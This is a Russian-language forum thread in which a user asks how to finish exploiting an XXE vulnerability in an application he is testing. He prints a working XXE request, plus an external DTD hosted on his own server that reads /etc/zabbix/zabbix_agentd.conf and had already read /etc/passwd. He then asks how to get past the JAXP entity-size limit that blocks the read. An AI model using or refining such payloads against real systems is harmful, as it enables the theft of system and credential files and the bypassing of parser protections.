• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

XXE инъекция

robdollard

Green Team
02.05.2018
65
68
BIT
16
Всем здравствуйте, проблема в следующем, была найдена уязвимость в тестируемом приложении XXE вообщем то все хорошо, с помощью нее можно прочитать например файл etc/passwd но интресной информации он не содержит, интересен файл etc/zabbix/zabbix_agent.conf
ну и некоторые другие, но проблема в том что если /etc/passwd читается без проблем то вот с этим файлом в частности возникли проблемы, вот что выдает парсер при попытке его прочитать
Код:
Error 400 Exception loading Request: The declaration for the entity "e1" must end with '>'.

Вот сам запрос
Код:
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM  "мой сервер/ext.dtd"> 
<foo>&e1;</foo>

вот файл ext.dtd

<!ENTITY % p1 SYSTEM "file:///etc/zabbix/zabbix_agentd.conf">
<!ENTITY % p2 "<<!ENTITY e1 SYSTEM 'file///%p1;'>">
%p2;

Я так полагаю ему не нравятся символы которые находятся в этом файле и он не хочет их пихать в ответ сервера. Но вот как это обойти. Может быть у кого то есть идеи по этому поводу? или кто то сталкивался с таким при эксплуатации это уязвимости?
 

robdollard

Green Team
02.05.2018
65
68
BIT
16
ну вообщем к сожалению так и не смог обойти, теперь появилась другая ошибка
Код:
>Error 400 Exception loading Request: JAXP00010003: The length of entity &quot;%c&quot; is &quot;1 000 040&quot; that exceeds the &quot;1 000 000&quot; limit set by &quot;FEATURE_SECURE_PROCESSING&quo
Кто нибудь сталкивался? это защита MaxEntitySizeLimit от XML BOMB может быть можно сделать payload который бы определял какое количество байтов я хочу прочитать? Есть специалисты в XML?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!